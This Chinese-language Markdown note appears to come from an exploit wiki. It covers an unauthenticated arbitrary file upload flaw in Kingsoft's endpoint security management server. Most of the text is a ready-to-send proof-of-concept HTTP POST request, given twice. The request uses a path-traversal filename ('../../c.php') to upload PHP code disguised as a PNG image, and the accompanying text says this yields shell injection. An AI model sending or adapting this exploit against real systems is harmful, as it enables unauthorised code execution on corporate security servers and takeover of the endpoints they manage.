金山终端安全管理系统管理员服务端口任意文件上传.md

fofamini-wiki

登录白背景

源码

/Inter/software_relation.php 未配置验证，可未授权访问，其中55-65行，移动文件名会直接拼接photo_name变量，且后缀名可控，当61行处copy成功时可以任意shell注入

#  EXP

Poc
POST /inter/software_relation.php HTTP/1.1
Host: 192.168.163.129:6868
Content-Length: 1758
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://192.168.163.129:6868
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxRP5VjBKdqBrCixM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.163.129:6868/softmanagement/distribute/updatamain.php?m1=5&m2=0&m3=4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close

------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="userSession"


------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="mode_id"
1

------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolFileName"


------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolFileName"

./../default.png
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolDescri"


------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="id"

0
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="version"


------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="sofe_typeof"


------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolName"


------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="fileSize"


------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="param"

a
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolImage"; filename="../../c.php"
Content-Type: image/png

<?php phpinfo(); ?>
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolImageType"

0
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolName"

a
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolDescri"

b
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="version"

c
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="param"

1
------WebKitFormBoundaryxRP5VjBKdqBrCixM--

![image-20220725151910087](金山终端安全管理系统管理员服务端口任意文件上传.assets/image-20220725151910087.png)

![image-20220725151912818](金山终端安全管理系统管理员服务端口任意文件上传.assets/image-20220725151912818.png)

```bash
#  EXP

Poc
POST /inter/software_relation.php HTTP/1.1
Host: 192.168.163.129:6868
Content-Length: 1758
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://192.168.163.129:6868
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxRP5VjBKdqBrCixM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.163.129:6868/softmanagement/distribute/updatamain.php?m1=5&m2=0&m3=4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close

------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="userSession"

------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="mode_id"
1

------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolFileName"

./../default.png
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolDescri"

------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="id"

0
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="version"

------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="sofe_typeof"

------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolName"

------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="fileSize"

------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="param"

a
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolImage"; filename="../../c.php"
Content-Type: image/png

<?php phpinfo(); ?>
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolImageType"

0
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolName"

a
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolDescri"

b
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="version"

c
------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="param"

1
------WebKitFormBoundaryxRP5VjBKdqBrCixM--

```